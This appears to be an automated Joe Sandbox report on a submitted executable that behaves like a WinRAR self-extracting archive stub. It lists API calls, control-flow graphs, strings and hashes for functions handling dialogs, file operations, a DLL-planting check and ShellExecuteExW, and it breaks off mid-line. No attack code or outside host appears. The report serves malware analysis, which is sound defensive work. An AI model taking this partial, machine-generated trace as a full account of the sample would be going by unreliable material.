__vsnwprintf_l 24797 d61075 82 API calls pre_c_initialization 23786 d7d573 23787 d7d580 23786->23787 23788 d6ddd1 53 API calls 23787->23788 23789 d7d594 23788->23789 23790 d6400a _swprintf 51 API calls 23789->23790 23791 d7d5a6 SetDlgItemTextW 23790->23791 23794 d7ac74 PeekMessageW 23791->23794 23795 d7ac8f GetMessageW 23794->23795 23796 d7acc8 23794->23796 23797 d7aca5 IsDialogMessageW 23795->23797 23798 d7acb4 TranslateMessage DispatchMessageW 23795->23798 23797->23796 23797->23798 23798->23796 24802 d7fc60 51 API calls 2 library calls 24805 d83460 RtlUnwind 24806 d89c60 71 API calls _free 24842 d66110 80 API calls 24843 d8b710 GetProcessHeap 24845 d7be49 108 API calls 4 library calls 24846 d61f05 126 API calls __EH_prolog 24807 d7ea00 46 API calls 6 library calls 24650 d7c40e 24651 d7c4c7 24650->24651 24659 d7c42c _wcschr 24650->24659 24652 d7c4e5 24651->24652 24668 d7be49 _wcsrchr 24651->24668 24685 d7ce22 24651->24685 24655 d7ce22 18 API calls 24652->24655 24652->24668 24653 d7aa36 ExpandEnvironmentStringsW 24653->24668 24655->24668 24656 d7ca8d 24658 d717ac CompareStringW 24658->24659 24659->24651 24659->24658 24660 d7c11d SetWindowTextW 24660->24668 24663 d835de 22 API calls 24663->24668 24665 d7bf0b SetFileAttributesW 24667 d7bfc5 GetFileAttributesW 24665->24667 24678 d7bf25 ___scrt_get_show_window_mode 24665->24678 24667->24668 24669 d7bfd7 DeleteFileW 24667->24669 24668->24653 24668->24656 24668->24660 24668->24663 24668->24665 24671 d7c2e7 GetDlgItem SetWindowTextW SendMessageW 24668->24671 24674 d7c327 SendMessageW 24668->24674 24679 d717ac CompareStringW 24668->24679 24680 d79da4 GetCurrentDirectoryW 24668->24680 24682 d6a52a 7 API calls 24668->24682 24683 d6a4b3 FindClose 24668->24683 24684 d7ab9a 76 API calls new 24668->24684 24669->24668 24672 d7bfe8 24669->24672 24671->24668 24673 d6400a _swprintf 51 API calls 24672->24673 24675 d7c008 GetFileAttributesW 24673->24675 24674->24668 24675->24672 24676 d7c01d MoveFileW 24675->24676 24676->24668 24677 d7c035 MoveFileExW 24676->24677 24677->24668 24678->24667 24678->24668 24681 d6b4f7 52 API calls 2 library calls 24678->24681 24679->24668 24680->24668 24681->24678 24682->24668 24683->24668 24684->24668 24686 d7ce2c ___scrt_get_show_window_mode 24685->24686 24687 d7cf1b 24686->24687 24693 d7d08a 24686->24693 24708 d717ac CompareStringW 24686->24708 24689 d6a180 4 API calls 24687->24689 24690 d7cf30 24689->24690 24691 d7cf4f ShellExecuteExW 24690->24691 24709 d6b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24690->24709 24691->24693 24699 d7cf62 24691->24699 24693->24652 24694 d7cf47 24694->24691 24695 d7cf9b 24710 d7d2e6 6 API calls 24695->24710 24696 d7cff1 CloseHandle 24697 d7cfff 24696->24697 24698 d7d00a 24696->24698 24711 d717ac CompareStringW 24697->24711 24698->24693 24704 d7d081 ShowWindow 24698->24704 24699->24695 24699->24696 24701 d7cf91 ShowWindow 24699->24701 24701->24695 24703 d7cfb3 24703->24696 24705 d7cfc6 GetExitCodeProcess 24703->24705 24704->24693 24705->24696 24706 d7cfd9 24705->24706 24706->24696 24708->24687 24709->24694 24710->24703 24711->24698 24808 d7ec0b 28 API calls 2 library calls 24848 d7db0b 19 API calls ___delayLoadHelper2@8 24849 d7be49 103 API calls 4 library calls 24809 d7a430 73 API calls 24739 d8b731 31 API calls ___delayLoadHelper2@8 24810 d61025 29 API calls pre_c_initialization 24745 d69f2f 24746 d69f44 24745->24746 24747 d69f3d 24745->24747 24748 d69f4a GetStdHandle 24746->24748 24755 d69f55 24746->24755 24748->24755 24749 d69fa9 WriteFile 24749->24755 24750 d69f7c WriteFile 24751 d69f7a 24750->24751 24750->24755 24751->24750 24751->24755 24753 d6a031 24757 d67061 75 API calls 24753->24757 24755->24747 24755->24749 24755->24750 24755->24751 24755->24753 24756 d66e18 60 API calls 24755->24756 24756->24755 24757->24747

                                Executed Functions

                                Function 00D7D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D700CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                                  • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                                  • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                                  • Part of subcall function 00D79DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D79DAC
                                  • Part of subcall function 00D7A335: OleInitialize.OLE32(00000000), ref: 00D7A34E
                                  • Part of subcall function 00D7A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                                  • Part of subcall function 00D7A335: SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                                  • Part of subcall function 00D713B3: GetCPInfo.KERNEL32(00000000,?), ref: 00D713C4
                                  • Part of subcall function 00D713B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D713D8
                                • GetCommandLineW.KERNEL32 ref: 00D7D61C
                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D7D643
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D7D654
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00D7D68E
                                  • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                                  • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                                • CloseHandle.KERNEL32(00000000), ref: 00D7D697
                                • GetModuleFileNameW.KERNEL32(00000000,00DBDC90,00000800), ref: 00D7D6B2
                                • SetEnvironmentVariableW.KERNEL32(sfxname,00DBDC90), ref: 00D7D6BE
                                • GetLocalTime.KERNEL32(?), ref: 00D7D6C9
                                • _swprintf.LIBCMT ref: 00D7D708
                                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D7D71A
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00D7D721
                                • LoadIconW.USER32(00000000,00000064), ref: 00D7D738
                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00D7D789
                                • Sleep.KERNEL32(?), ref: 00D7D7B7
                                • DeleteObject.GDI32 ref: 00D7D7F0
                                • DeleteObject.GDI32(?), ref: 00D7D800
                                • CloseHandle.KERNEL32 ref: 00D7D843
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                • API String ID: 788466649-3743209390
                                • Opcode ID: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                                • Instruction ID: 8d0b8354c1599ae57036f21089078b39569876d11931fd150247357d846e2589
                                • Opcode Fuzzy Hash: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                                • Instruction Fuzzy Hash: E761AE71904341AFD320AFA5EC49F6A3BA9EF49744F04442AF94DD23A1EBB89904D772
                                Function 00D79E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 770 d79e1c-d79e38 FindResourceW 771 d79f2f-d79f32 770->771 772 d79e3e-d79e50 SizeofResource 770->772 773 d79e52-d79e61 LoadResource 772->773 774 d79e70-d79e72 772->774 773->774 775 d79e63-d79e6e LockResource 773->775 776 d79f2e 774->776 775->774 777 d79e77-d79e8c GlobalAlloc 775->777 776->771 778 d79e92-d79e9b GlobalLock 777->778 779 d79f28-d79f2d 777->779 780 d79f21-d79f22 GlobalFree 778->780 781 d79ea1-d79ebf call d7f4b0 778->781 779->776 780->779 785 d79ec1-d79ee3 call d79d7b 781->785 786 d79f1a-d79f1b GlobalUnlock 781->786 785->786 791 d79ee5-d79eed 785->791 786->780 792 d79eef-d79f03 GdipCreateHBITMAPFromBitmap 791->792 793 d79f08-d79f16 791->793 792->793 794 d79f05 792->794 793->786 794->793
                                APIs
                                • FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                                • LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                                • LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D7AE4D,00000066), ref: 00D79E82
                                • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D7AE4D,00000066), ref: 00D79E93
                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D79EFC
                                • GlobalUnlock.KERNEL32(00000000), ref: 00D79F1B
                                • GlobalFree.KERNEL32(00000000), ref: 00D79F22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                • String ID: PNG
                                • API String ID: 4097654274-364855578
                                • Opcode ID: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                                • Instruction ID: c997053687efb7e2a6fd40bbd5b0be11adaf3b8c3e531b1627012d28e2a36ba3
                                • Opcode Fuzzy Hash: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                                • Instruction Fuzzy Hash: 98316172204706AFC7109F61DC58D2BFBA9FF85751B088519F90AD2361EB31DD009AB1
                                Function 00D6A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 971 d6a5f4-d6a61f call d7e360 974 d6a691-d6a69a FindNextFileW 971->974 975 d6a621-d6a632 FindFirstFileW 971->975 978 d6a6b0-d6a6b2 974->978 979 d6a69c-d6a6aa GetLastError 974->979 976 d6a6b8-d6a75c call d6fe56 call d6bcfb call d70e19 * 3 975->976 977 d6a638-d6a64f call d6b66c 975->977 982 d6a761-d6a774 976->982 986 d6a651-d6a668 FindFirstFileW 977->986 987 d6a66a-d6a673 GetLastError 977->987 978->976 978->982 979->978 986->976 986->987 989 d6a684 987->989 990 d6a675-d6a678 987->990 993 d6a686-d6a68c 989->993 990->989 992 d6a67a-d6a67d 990->992 992->989 995 d6a67f-d6a682 992->995 993->982 995->993
                                APIs
                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A628
                                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A65E
                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A66A
                                • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A692
                                • GetLastError.KERNEL32(?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A69E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileFind$ErrorFirstLast$Next
                                • String ID:
                                • API String ID: 869497890-0
                                • Opcode ID: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                                • Instruction ID: ddc99282034ddc0b3c8bed9f1d8de0faaa1d0db1a2998b649817093dbe4ae0b6
                                • Opcode Fuzzy Hash: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                                • Instruction Fuzzy Hash: DA415E72504641AFC324EF68C884ADAF7E8FF48354F084A2AF5D9D3250D774A9648FB2
                                Function 00D8753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D8755E
                                • TerminateProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D87565
                                • ExitProcess.KERNEL32 ref: 00D87577
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                                • Instruction ID: 8513493584ce56ae4766a79ca4ba43cda318a3e2f919be6e1904e36880f7149f
                                • Opcode Fuzzy Hash: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                                • Instruction Fuzzy Hash: 7CE0B635004648ABCF11BF68DD09A497B69EB40745F248455F9099A232CB35DE42CB70
                                Function 00D6857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog_memcmp
                                • String ID:
                                • API String ID: 3004599000-0
                                • Opcode ID: 1e8d2c72c224d3f93d7f419326a9affa63771adcacdda08e12112670b199dd97
                                • Instruction ID: c2d5bb96863db2fddc22103fc6ddecd18d7d2b2de394f3a159e86d75b330b531
                                • Opcode Fuzzy Hash: 1e8d2c72c224d3f93d7f419326a9affa63771adcacdda08e12112670b199dd97
                                • Instruction Fuzzy Hash: 03823A70904245AFDF25CF64C895BFABBB9EF15300F0C42BAE959AB142DB315A48DB70
                                Function 00D7AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D7AEE5
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prologItemTextWindow
                                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                • API String ID: 810644672-8108337
                                • Opcode ID: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                                • Instruction ID: 14a32b03595e604df98e7bdffeb955e2fd2abe8e685ed61dde2474a5504028b9
                                • Opcode Fuzzy Hash: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                                • Instruction Fuzzy Hash: D5420570904345AFEB21ABA09C4AFBE7B7DEB06710F048156F649E62D1EBB44D44DB32
                                Function 00D700CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 257 d700cf-d700ee call d7e360 GetModuleHandleW 260 d70154-d703b2 257->260 261 d700f0-d70107 GetProcAddress 257->261 262 d70484-d704b3 GetModuleFileNameW call d6bc85 call d6fe56 260->262 263 d703b8-d703c3 call d870dd 260->263 264 d70121-d70131 GetProcAddress 261->264 265 d70109-d7011f 261->265 279 d704b5-d704bf call d6acf5 262->279 263->262 274 d703c9-d703fa GetModuleFileNameW CreateFileW 263->274 264->260 266 d70133-d70152 264->266 265->264 266->260 276 d703fc-d7040a SetFilePointer 274->276 277 d70478-d7047f CloseHandle 274->277 276->277 280 d7040c-d70429 ReadFile 276->280 277->262 286 d704c1-d704c5 call d70085 279->286 287 d704cc 279->287 280->277 282 d7042b-d70450 280->282 284 d7046d-d70476 call d6fbd8 282->284 284->277 293 d70452-d7046c call d70085 284->293 294 d704ca 286->294 288 d704ce-d704d0 287->288 291 d704f2-d70518 call d6bcfb GetFileAttributesW 288->291 292 d704d2-d704f0 CompareStringW 288->292 295 d7051a-d7051e 291->295 301 d70522 291->301 292->291 292->295 293->284 294->288 295->279 300 d70520 295->300 302 d70526-d70528 300->302 301->302 303 d70560-d70562 302->303 304 d7052a 302->304 305 d7066f-d70679 303->305 306 d70568-d7057f call d6bccf call d6acf5 303->306 307 d7052c-d70552 call d6bcfb GetFileAttributesW 304->307 317 d705e7-d7061a call d6400a AllocConsole 306->317 318 d70581-d705e2 call d70085 * 2 call d6ddd1 call d6400a call d6ddd1 call d79f35 306->318 313 d70554-d70558 307->313 314 d7055c 307->314 313->307 316 d7055a 313->316 314->303 316->303 323 d70667-d70669 ExitProcess 317->323 324 d7061c-d70661 GetCurrentProcessId AttachConsole call d835b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D703D4
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D703F0
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D70402
                                • ReadFile.KERNEL32(00000000,?,00007FFE,00D93BA4,00000000), ref: 00D70421
                                • CloseHandle.KERNEL32(00000000), ref: 00D70479
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7048F
                                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D704E7
                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00D70510
                                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00D7054A
                                  • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                                  • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                • _swprintf.LIBCMT ref: 00D705BE
                                • _swprintf.LIBCMT ref: 00D7060A
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • AllocConsole.KERNEL32 ref: 00D70612
                                • GetCurrentProcessId.KERNEL32 ref: 00D7061C
                                • AttachConsole.KERNEL32(00000000), ref: 00D70623
                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D70649
                                • WriteConsoleW.KERNEL32(00000000), ref: 00D70650
                                • Sleep.KERNEL32(00002710), ref: 00D7065B
                                • FreeConsole.KERNEL32 ref: 00D70661
                                • ExitProcess.KERNEL32 ref: 00D70669
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                • API String ID: 1201351596-3298887752
                                • Opcode ID: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                                • Instruction ID: 3268a430e0e20869bc9bacf7909711312be4474e19cd2eb238f2f94b612a43e5
                                • Opcode Fuzzy Hash: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                                • Instruction Fuzzy Hash: 36D13FB1508384EBDB309F50D849B9FBBE8EF85704F54491DF68D96390DBB08A498B72
                                Function 00D7BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 406 d7bdf5-d7be0d call d7e28c call d7e360 411 d7be13-d7be3d call d7aa36 406->411 412 d7ca90-d7ca9d 406->412 411->412 415 d7be43-d7be48 411->415 416 d7be49-d7be57 415->416 417 d7be58-d7be6d call d7a6c7 416->417 420 d7be6f 417->420 421 d7be71-d7be86 call d717ac 420->421 424 d7be93-d7be96 421->424 425 d7be88-d7be8c 421->425 427 d7ca5c-d7ca87 call d7aa36 424->427 428 d7be9c 424->428 425->421 426 d7be8e 425->426 426->427 427->416 442 d7ca8d-d7ca8f 427->442 430 d7c115-d7c117 428->430 431 d7c074-d7c076 428->431 432 d7bea3-d7bea6 428->432 433 d7c132-d7c134 428->433 430->427 436 d7c11d-d7c12d SetWindowTextW 430->436 431->427 438 d7c07c-d7c088 431->438 432->427 434 d7beac-d7bf06 call d79da4 call d6b965 call d6a49d call d6a5d7 call d670bf 432->434 433->427 437 d7c13a-d7c141 433->437 495 d7c045-d7c05a call d6a52a 434->495 436->427 437->427 443 d7c147-d7c160 437->443 439 d7c09c-d7c0a1 438->439 440 d7c08a-d7c09b call d87168 438->440 446 d7c0a3-d7c0a9 439->446 447 d7c0ab-d7c0b6 call d7ab9a 439->447 440->439 442->412 448 d7c162 443->448 449 d7c168-d7c176 call d835b3 443->449 453 d7c0bb-d7c0bd 446->453 447->453 448->449 449->427 460 d7c17c-d7c185 449->460 458 d7c0bf-d7c0c6 call d835b3 453->458 459 d7c0c8-d7c0e8 call d835b3 call d835de 453->459 458->459 480 d7c101-d7c103 459->480 481 d7c0ea-d7c0f1 459->481 464 d7c187-d7c18b 460->464 465 d7c1ae-d7c1b1 460->465 464->465 469 d7c18d-d7c195 464->469 471 d7c1b7-d7c1ba 465->471 472 d7c296-d7c2a4 call d6fe56 465->472 469->427 476 d7c19b-d7c1a9 call d6fe56 469->476 478 d7c1c7-d7c1e2 471->478 479 d7c1bc-d7c1c1 471->479 488 d7c2a6-d7c2ba call d817cb 472->488 476->488 496 d7c1e4-d7c21e 478->496 497 d7c22c-d7c233 478->497 479->472 479->478 480->427 487 d7c109-d7c110 call d835ce 480->487 485 d7c0f3-d7c0f5 481->485 486 d7c0f8-d7c100 call d87168 481->486 485->486 486->480 487->427 506 d7c2c7-d7c318 call d6fe56 call d7a8d0 GetDlgItem SetWindowTextW SendMessageW call d835e9 488->506 507 d7c2bc-d7c2c0 488->507 512 d7c060-d7c06f call d6a4b3 495->512 513 d7bf0b-d7bf1f SetFileAttributesW 495->513 525 d7c222-d7c224 496->525 526 d7c220 496->526 499 d7c235-d7c24d call d835b3 497->499 500 d7c261-d7c284 call d835b3 * 2 497->500 499->500 517 d7c24f-d7c25c call d6fe2e 499->517 500->488 533 d7c286-d7c294 call d6fe2e 500->533 540 d7c31d-d7c321 506->540 507->506 511 d7c2c2-d7c2c4 507->511 511->506 512->427 519 d7bfc5-d7bfd5 GetFileAttributesW 513->519 520 d7bf25-d7bf58 call d6b4f7 call d6b207 call d835b3 513->520 517->500 519->495 523 d7bfd7-d7bfe6 DeleteFileW 519->523 549 d7bf6b-d7bf79 call 